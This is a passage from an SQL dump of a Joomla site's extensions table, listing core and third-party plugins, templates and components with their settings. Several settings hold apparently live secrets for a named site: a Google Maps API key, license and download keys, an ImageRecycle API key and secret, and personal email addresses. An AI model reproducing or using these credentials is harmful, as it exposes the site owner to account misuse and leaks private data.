reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_QUICKICON_PRIVACYCHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacycheck\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(489,0,'plg_user_terms','plugin','terms','user',0,0,1,0,'{\"name\":\"plg_user_terms\",\"type\":\"plugin\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_USER_TERMS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"terms\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(490,0,'plg_privacy_contact','plugin','contact','privacy',0,1,1,0,'{\"name\":\"plg_privacy_contact\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(491,0,'plg_privacy_content','plugin','content','privacy',0,1,1,0,'{\"name\":\"plg_privacy_content\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(492,0,'plg_privacy_message','plugin','message','privacy',0,1,1,0,'{\"name\":\"plg_privacy_message\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_MESSAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"message\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(493,0,'plg_privacy_actionlogs','plugin','actionlogs','privacy',0,1,1,0,'{\"name\":\"plg_privacy_actionlogs\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"actionlogs\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(494,0,'plg_captcha_recaptcha_invisible','plugin','recaptcha_invisible','captcha',0,0,1,0,'{\"name\":\"plg_captcha_recaptcha_invisible\",\"type\":\"plugin\",\"creationDate\":\"November 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_INVISIBLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"recaptcha_invisible\"}','{\"public_key\":\"\",\"private_key\":\"\",\"theme\":\"clean\"}','','',0,'0000-00-00 00:00:00',0,0),(495,0,'plg_privacy_consents','plugin','consents','privacy',0,1,1,0,'{\"name\":\"plg_privacy_consents\",\"type\":\"plugin\",\"creationDate\":\"July 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_PRIVACY_CONSENTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"consents\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(503,0,'beez3','template','beez3','',0,1,1,0,'{\"name\":\"beez3\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"3.1.0\",\"description\":\"TPL_BEEZ3_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}','','',0,'0000-00-00 00:00:00',0,0),(504,0,'hathor','template','hathor','',1,1,1,0,'{\"name\":\"hathor\",\"type\":\"template\",\"creationDate\":\"May 2010\",\"author\":\"Andrea Tarr\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"3.0.0\",\"description\":\"TPL_HATHOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"showSiteName\":\"0\",\"colourChoice\":\"0\",\"boldText\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(506,0,'protostar','template','protostar','',0,1,1,0,'{\"name\":\"protostar\",\"type\":\"template\",\"creationDate\":\"4\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_PROTOSTAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(507,0,'isis','template','isis','',1,1,1,0,'{\"name\":\"isis\",\"type\":\"template\",\"creationDate\":\"3\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_ISIS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"templateColor\":\"\",\"logoFile\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(600,802,'English (en-GB)','language','en-GB','',0,1,1,1,'{\"name\":\"English (en-GB)\",\"type\":\"language\",\"creationDate\":\"October 2020\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.22\",\"description\":\"en-GB site language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(601,802,'English (en-GB)','language','en-GB','',1,1,1,1,'{\"name\":\"English (en-GB)\",\"type\":\"language\",\"creationDate\":\"October 2020\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.22\",\"description\":\"en-GB administrator language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(700,0,'files_joomla','file','joomla','',0,1,1,1,'{\"name\":\"files_joomla\",\"type\":\"file\",\"creationDate\":\"October 2020\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.22\",\"description\":\"FILES_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(802,0,'English (en-GB) Language Pack','package','pkg_en-GB','',0,1,1,1,'{\"name\":\"English (en-GB) Language Pack\",\"type\":\"package\",\"creationDate\":\"October 2020\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.22.1\",\"description\":\"en-GB language pack\",\"group\":\"\",\"filename\":\"pkg_en-GB\"}','','','',0,'0000-00-00 00:00:00',0,0),(10001,0,'Helix3 - Ajax','plugin','helix3','ajax',0,1,1,0,'{\"name\":\"Helix3 - Ajax\",\"type\":\"plugin\",\"creationDate\":\"Jan 2015\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (c) 2010 - 2020 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"2.5.6\",\"description\":\"Helix3 Framework - Joomla Template Framework by JoomShaper\",\"group\":\"\",\"filename\":\"helix3\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10002,0,'System - Helix3 Framework','plugin','helix3','system',0,1,1,0,'{\"name\":\"System - Helix3 Framework\",\"type\":\"plugin\",\"creationDate\":\"Jan 2015\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (c) 2010 - 2020 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"2.5.8\",\"description\":\"Helix3 Framework - Joomla Template Framework by JoomShaper\",\"group\":\"\",\"filename\":\"helix3\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10003,0,'shaper_helix3','template','shaper_helix3','',0,1,1,0,'{\"name\":\"shaper_helix3\",\"type\":\"template\",\"creationDate\":\"Jan 2016\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (c) 2010 - 2020 JoomShaper.com. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"http:\\/\\/www.joomshaper.com\",\"version\":\"2.5.8\",\"description\":\"Shaper Helix3 - Starter Template of Helix3 framework\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"sticky_header\":\"1\",\"boxed_layout\":\"0\",\"logo_type\":\"image\",\"logo_position\":\"logo\",\"body_bg_repeat\":\"inherit\",\"body_bg_size\":\"inherit\",\"body_bg_attachment\":\"inherit\",\"body_bg_position\":\"0 0\",\"enabled_copyright\":\"1\",\"copyright_position\":\"footer1\",\"copyright\":\"\\u00a9 2015 Your Company. All Rights Reserved. Designed By JoomShaper\",\"show_social_icons\":\"1\",\"social_position\":\"top1\",\"enable_contactinfo\":\"1\",\"contact_position\":\"top2\",\"contact_phone\":\"+228 872 4444\",\"contact_email\":\"contact@email.com\",\"comingsoon_mode\":\"0\",\"comingsoon_title\":\"Coming Soon Title\",\"comingsoon_date\":\"5-10-2018\",\"comingsoon_content\":\"Coming soon content\",\"preset\":\"preset1\",\"preset1_bg\":\"#ffffff\",\"preset1_text\":\"#000000\",\"preset1_major\":\"#22b8f0\",\"preset2_bg\":\"#f2f2f2\",\"preset2_text\":\"#666666\",\"preset2_major\":\"#22b8f0\",\"preset3_bg\":\"#f2f2f2\",\"preset3_text\":\"#666666\",\"preset3_major\":\"#22b8f0\",\"menu\":\"mainmenu\",\"menu_type\":\"1\",\"menu_animation\":\"1\",\"enable_body_font\":\"0\",\"enable_h1_font\":\"0\",\"enable_h2_font\":\"0\",\"enable_h3_font\":\"0\",\"enable_h4_font\":\"0\",\"enable_h5_font\":\"0\",\"enable_h6_font\":\"0\",\"enable_navigation_font\":\"0\",\"enable_custom_font\":\"0\",\"compress_css\":\"0\",\"compress_js\":\"0\",\"lessoption\":\"0\",\"show_post_format\":\"1\",\"commenting_engine\":\"disqus\",\"disqus_devmode\":\"0\",\"intensedebate_acc\":\"\",\"fb_width\":\"500\",\"fb_cpp\":\"10\",\"comments_count\":\"1\",\"social_share\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10004,0,'SP Page Builder','component','com_sppagebuilder','',1,1,0,0,'{\"name\":\"SP Page Builder\",\"type\":\"component\",\"creationDate\":\"Sep 2014\",\"author\":\"JoomShaper\",\"copyright\":\"Copyright @ 2010 - 2019 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"https:\\/\\/www.joomshaper.com\",\"version\":\"3.7.4\",\"description\":\"\",\"group\":\"\",\"filename\":\"sppagebuilder\"}','{\"addcontainer\":\"1\",\"gmap_api\":\"AIzaSyDYW_74sjQbNj73TvvLzDh_QAWn-qMvqw4\",\"fontawesome\":\"1\",\"disableanimatecss\":\"0\",\"disablecss\":\"0\",\"disable_og\":\"0\",\"joomshaper_email\":\"bevan@crashtackle.co.za\",\"joomshaper_license_key\":\"58b5b1e44ceef4c6244f86bb8d812b53\"}','','',0,'0000-00-00 00:00:00',0,0),(10005,0,'mod_sppagebuilder_icons','module','mod_sppagebuilder_icons','',1,1,2,0,'{\"name\":\"mod_sppagebuilder_icons\",\"type\":\"module\",\"creationDate\":\"August 2014\",\"author\":\"JoomShaper\",\"copyright\":\"Copyright (C) 2010 - 2016 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.0.2\",\"description\":\"MOD_SPPAGEBUILDER_ICONS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_sppagebuilder_icons\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10006,0,'mod_sppagebuilder_admin_menu','module','mod_sppagebuilder_admin_menu','',1,1,2,0,'{\"name\":\"mod_sppagebuilder_admin_menu\",\"type\":\"module\",\"creationDate\":\"August 2014\",\"author\":\"JoomShaper\",\"copyright\":\"Copyright (C) 2010 - 2017 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.3\",\"description\":\"MOD_SPPAGEBUILDER_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_sppagebuilder_admin_menu\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10009,0,'plg_search_sppagebuilder','plugin','sppagebuilder','search',0,1,1,0,'{\"name\":\"plg_search_sppagebuilder\",\"type\":\"plugin\",\"creationDate\":\"July 2015\",\"author\":\"JoomShaper\",\"copyright\":\"Copyright (C) 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.5\",\"description\":\"PLG_SEARCH_SPPAGEBUILDER_DESCRIPTION\",\"group\":\"\",\"filename\":\"sppagebuilder\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10010,0,'System - SP Page Builder Pro Updater','plugin','sppagebuilderproupdater','system',0,1,1,0,'{\"name\":\"System - SP Page Builder Pro Updater\",\"type\":\"plugin\",\"creationDate\":\"Jul 2015\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2016 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.1\",\"description\":\"SP Page Builder Pro Updater Plugin\",\"group\":\"\",\"filename\":\"sppagebuilderproupdater\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10011,0,'plg_installer_webinstaller','plugin','webinstaller','installer',0,1,1,0,'{\"name\":\"plg_installer_webinstaller\",\"type\":\"plugin\",\"creationDate\":\"28 April 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2013 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.1.2\",\"description\":\"PLG_INSTALLER_WEBINSTALLER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"webinstaller\"}','{\"tab_position\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10013,10018,'Akeeba','component','com_akeeba','',1,1,0,0,'{\"name\":\"Akeeba\",\"type\":\"component\",\"creationDate\":\"2019-03-14\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Akeeba Ltd \\/ Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"6.4.2\",\"description\":\"Akeeba Backup Pro - Full Joomla! site backup solution, Professional Edition\",\"group\":\"\",\"filename\":\"akeeba\"}','{\"frontend_enable\":\"1\",\"failure_frontend_enable\":\"1\",\"frontend_secret_word\":\"###AES128###y4yV85uYMJXLA9j8iMKFzEh4iInQSeqsdtPs4C5d4qNKUFNUeSXycTO49sXY+1iBPfdFRO8F2OipebEGF31I5jygrvA4yPNJjx34hTGRiw0hhR6o56mPZAje3JFIA7TA5l9BY0pQSVbOke03PnypZpMBb21Djf21FAAAAA==\",\"forced_backup_timezone\":\"AKEEBA\\/DEFAULT\",\"frontend_email_on_finish\":\"1\",\"frontend_email_address\":\"bevan@webspring.co.za\",\"frontend_email_subject\":\"Backup Complete - Smith and Smith\",\"frontend_email_body\":\"Backup Complete - Smith and Smith\",\"failure_timeout\":180,\"failure_email_address\":\"\",\"failure_email_subject\":\"\",\"failure_email_body\":\"\",\"siteurl\":\"https:\\/\\/smithandsmith.co.za\\/\",\"jversion\":\"1.6\",\"jlibrariesdir\":\"\\/home\\/smthsmth\\/public_html\\/libraries\",\"lastversion\":\"\",\"angieupgrade\":\"0\",\"show_howtorestoremodal\":\"0\",\"updatedb\":null,\"update_dlid\":\"e71ed15695d9335d00057d6681477e90\",\"autoupdateCli\":\"1\",\"notificationFreq\":\"1\",\"notificationTime\":\"day\",\"notificationEmail\":\"\",\"stats_enabled\":\"1\",\"useencryption\":\"1\",\"dateformat\":\"\",\"localtime\":\"1\",\"timezonetext\":\"T\",\"desktop_notifications\":\"0\",\"push_preference\":\"0\",\"push_apikey\":\"\",\"confwiz_upgrade\":1}','','',0,'0000-00-00 00:00:00',0,0),(10014,10018,'file_akeeba','file','file_akeeba','',0,1,0,0,'{\"name\":\"file_akeeba\",\"type\":\"file\",\"creationDate\":\"2019-03-14\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Akeeba Ltd \\/ Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"6.4.2\",\"description\":\"Akeeba Backup CLI scripts v.6.4.2\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10015,10018,'plg_quickicon_akeebabackup','plugin','akeebabackup','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_akeebabackup\",\"type\":\"plugin\",\"creationDate\":\"2019-03-14\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"6.4.2\",\"description\":\"PLG_QUICKICON_AKEEBABACKUP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"akeebabackup\"}','{\"context\":\"mod_quickicon\",\"enablewarning\":\"1\",\"warnfailed\":\"1\",\"maxbackupperiod\":\"24\",\"profileid\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10016,10018,'PLG_SYSTEM_AKEEBAUPDATECHECK','plugin','akeebaupdatecheck','system',0,0,1,0,'{\"name\":\"PLG_SYSTEM_AKEEBAUPDATECHECK\",\"type\":\"plugin\",\"creationDate\":\"2019-03-14\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"6.4.2\",\"description\":\"PLG_AKEEBAUPDATECHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"akeebaupdatecheck\"}','{\"email\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10017,10018,'PLG_SYSTEM_BACKUPONUPDATE','plugin','backuponupdate','system',0,0,1,0,'{\"name\":\"PLG_SYSTEM_BACKUPONUPDATE\",\"type\":\"plugin\",\"creationDate\":\"2019-03-14\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"6.4.2\",\"description\":\"PLG_SYSTEM_BACKUPONUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"backuponupdate\"}','{\"profileid\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10018,0,'Akeeba Backup package','package','pkg_akeeba','',0,1,1,0,'{\"name\":\"Akeeba Backup package\",\"type\":\"package\",\"creationDate\":\"2019-03-14\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Akeeba Ltd \\/ Nicholas K. Dionysopoulos\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"6.4.2\",\"description\":\"Akeeba Backup installation package v.6.4.2\",\"group\":\"\",\"filename\":\"pkg_akeeba\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10019,10033,'Admintools','component','com_admintools','',1,1,0,0,'{\"name\":\"Admintools\",\"type\":\"component\",\"creationDate\":\"2019-01-07\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2010-2019 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"5.2.1\",\"description\":\"Security and utilitarian tools for Joomla! site administrators\",\"group\":\"\",\"filename\":\"admintools\"}','{\"downloadid\":\"e71ed15695d9335d00057d6681477e90\",\"siteurl\":\"https:\\/\\/smithandsmith.co.za\\/\",\"updatedb\":null,\"default_super_user_groups\":[\"\'8\'\"]}','','',0,'0000-00-00 00:00:00',0,0),(10020,10033,'PLG_SYSTEM_ADMINTOOLS','plugin','admintools','system',0,1,1,0,'{\"name\":\"PLG_SYSTEM_ADMINTOOLS\",\"type\":\"plugin\",\"creationDate\":\"2019-01-07\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2010-2019 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"5.2.1\",\"description\":\"PLG_SYSTEM_ADMINTOOLS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"admintools\"}','{\"language_override\":\"\",\"@spacer\":\"\",\"sesoptimizer\":\"0\",\"sesopt_freq\":\"60\",\"sescleaner\":\"0\",\"ses_freq\":\"60\",\"cachecleaner\":\"0\",\"cache_freq\":\"1440\",\"cacheexpire\":\"0\",\"cacheexp_freq\":\"60\",\"cleantemp\":\"0\",\"cleantemp_freq\":\"60\",\"deleteinactive\":\"0\",\"deleteinactive_days\":\"7\",\"maxlogentries\":\"0\"}','','',0,'0000-00-00 00:00:00',-1,0),(10021,0,'System - One Click Action','plugin','oneclickaction','system',0,0,1,0,'{\"name\":\"System - One Click Action\",\"type\":\"plugin\",\"creationDate\":\"2011-05-26\",\"author\":\"Nicholas K. Dionysopoulos \\/ AkeebaBackup.com\",\"copyright\":\"Copyright (c)2011-2016 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"2.1\",\"description\":\"PLG_ONCECLICK_DESCRIPTION\",\"group\":\"\",\"filename\":\"oneclickaction\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10022,0,'System - Admin Tools Update Email','plugin','atoolsupdatecheck','system',0,0,1,0,'{\"name\":\"System - Admin Tools Update Email\",\"type\":\"plugin\",\"creationDate\":\"2011-05-26\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2011-2016 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"1.0\",\"description\":\"PLG_ATOOLSUPDATECHECK_DESCRIPTION2\",\"group\":\"\",\"filename\":\"atoolsupdatecheck\"}','{\"language_override\":\"\",\"email\":\"\",\"singleclick\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10023,10033,'PLG_SYSTEM_ATOOLSJUPDATECHECK','plugin','atoolsjupdatecheck','system',0,0,1,0,'{\"name\":\"PLG_SYSTEM_ATOOLSJUPDATECHECK\",\"type\":\"plugin\",\"creationDate\":\"2011-05-26\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2010-2019 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"1.0\",\"description\":\"PLG_SYSTEM_ATOOLSJUPDATECHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"atoolsjupdatecheck\"}','{\"email\":\"\",\"singleclick\":\"0\",\"lastrun\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10025,0,'AkeebaStrapper','file','files_strapper','',0,1,0,0,'{\"name\":\"AkeebaStrapper\",\"type\":\"file\",\"creationDate\":\"2016-03-19\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"(C) 2012-2013 Akeeba Ltd.\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.5.4\",\"description\":\"Namespaced jQuery, jQuery UI and Bootstrap for Akeeba products.\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10029,0,'F0F (NEW) DO NOT REMOVE','library','lib_f0f','',0,1,1,0,'{\"name\":\"F0F (NEW) DO NOT REMOVE\",\"type\":\"library\",\"creationDate\":\"2016-03-19\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2014 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.5.4\",\"description\":\"Framework-on-Framework (FOF) newer version - DO NOT REMOVE - The rapid component development framework for Joomla!. This package is the newer version of FOF, not the one shipped with Joomla! as the official Joomla! RAD Layer. The Joomla! RAD Layer has ceased development in March 2014. DO NOT UNINSTALL THIS PACKAGE, IT IS *** N O T *** A DUPLICATE OF THE \'FOF\' PACKAGE. REMOVING EITHER FOF PACKAGE WILL BREAK YOUR SITE.\",\"group\":\"\",\"filename\":\"lib_f0f\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10031,0,'ImageRecycle','component','com_imagerecycle','',1,1,0,0,'{\"name\":\"ImageRecycle\",\"type\":\"component\",\"creationDate\":\"01-October-2014\",\"author\":\"ImageRecycle\",\"copyright\":\"\",\"authorEmail\":\"contact@imagerecycle.com\",\"authorUrl\":\"http:\\/\\/www.imagerecycle.com\",\"version\":\"2.0.21\",\"description\":\"COM_IMAGERECYCLE_DESCRIPTION\",\"group\":\"\",\"filename\":\"com_imagerecycle\"}','{\"api_url\":\"https:\\/\\/api.imagerecycle.com\\/v1\\/\",\"api_key\":\"e03113dd006192709a0d9a77ac59f19d\",\"api_secret\":\"481803830560a679ae93d64fadb55e706b8c35a19657de4a21\",\"installed_time\":\"\",\"include_folders\":\"images,media,templates\",\"resize_auto\":\"0\",\"resize_image\":\"1600\",\"min_size\":\"1\",\"max_size\":\"5120\",\"compression_type\":\"lossy\",\"compression_type_pdf\":\"lossy\",\"compression_type_png\":\"lossy\",\"compression_type_jpg\":\"lossy\",\"compression_type_gif\":\"lossy\",\"send_email\":\"1\",\"optimize_newmedia_auto\":\"0\",\"auto_method\":\"none\",\"run_periodicity\":\"0\",\"last_run\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10032,0,'Content - imagerecycle','plugin','imagerecycle','content',0,1,1,0,'{\"name\":\"Content - imagerecycle\",\"type\":\"plugin\",\"creationDate\":\"01-May-2015\",\"author\":\"ImageRecycle\",\"copyright\":\"\",\"authorEmail\":\"contact@imagerecycle.com\",\"authorUrl\":\"http:\\/\\/www.imagerecycle.com\",\"version\":\"2.0.16\",\"description\":\"Content plugin for Imagerecycle\",\"group\":\"\",\"filename\":\"imagerecycle\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10033,0,'Admin Tools package','package','pkg_admintools','',0,1,1,0,'{\"name\":\"Admin Tools package\",\"type\":\"package\",\"creationDate\":\"2019-01-07\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2010-2019 Akeeba Ltd \\/ Nicholas K. Dionysopoulos\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"5.2.1\",\"description\":\"Admin Tools Professional installation package v.5.2.1\",\"group\":\"\",\"filename\":\"pkg_admintools\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10035,10033,'file_admintools','file','file_admintools','',0,1,0,0,'{\"name\":\"file_admintools\",\"type\":\"file\",\"creationDate\":\"2019-01-07\",\"author\":\"Nicholas K. 